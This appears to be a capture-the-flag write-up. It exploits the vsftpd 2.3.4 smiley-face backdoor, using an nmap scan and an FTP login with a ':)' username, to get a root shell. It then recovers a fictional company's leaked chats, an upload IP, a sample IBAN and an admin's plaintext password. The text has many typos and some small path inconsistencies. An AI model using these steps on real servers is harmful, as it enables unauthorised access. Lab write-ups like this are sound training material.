- service scanning
An initial scan revealed an FTP service running on port 21 using an outdated and vulnerability version vsftpd2.3.4
command used:
nmap -sV <ip>
b. triggering the backdoor
the vsFtpd2.3.4 software contains a famous malicious backdoor built into its source code. Sendong a username that ends with a smiley face :) triggers the system to open a hidden listener on port 6200
*terminal #1 (Triggering FTP)
ftp <ip> 21
#Name: user:)
#Password: Enter
*Note: The connection hangs on purpose, meaning the backdoor succesfully spawned in the background.
c. Cathing the shell via Netcat: Gaining Root Access.
Using Netcat to connect directly to the newly opened backdoor port:
Phase #2 Digital forensics and Data recovery
Analying leaked chats. I nivigate to the /root directory revealed a file named "WhatsappChat.txt",
Robert extracted data from the server. They discussed selling Nexcorp's data to a secure buyer.
- Leaked Attacker IBAN DE89370400440532013000
b. identifying the attacker's IP Adress
To find where the data was uploaded from, the system logs were reviewed. a custom upload log file was located at /var/log/uploads.log
key log output: [2024–08–01 09:15:32] 198.51.100.5 | nexcorp.sql
the file nexcorp.sql represents the entire compromised corporated database. it was upload from the IP address 198.51.100.5
c. Extracting the leaked Admin Password
the leaked SQL file was located on the server at /etc./uploads/nexcorp.sql
cat /etc/uploads/nexcorp.sql
The user holding the admin role is Alice Green. Her plaintext password leaked in the dumb is AdminPass1234!.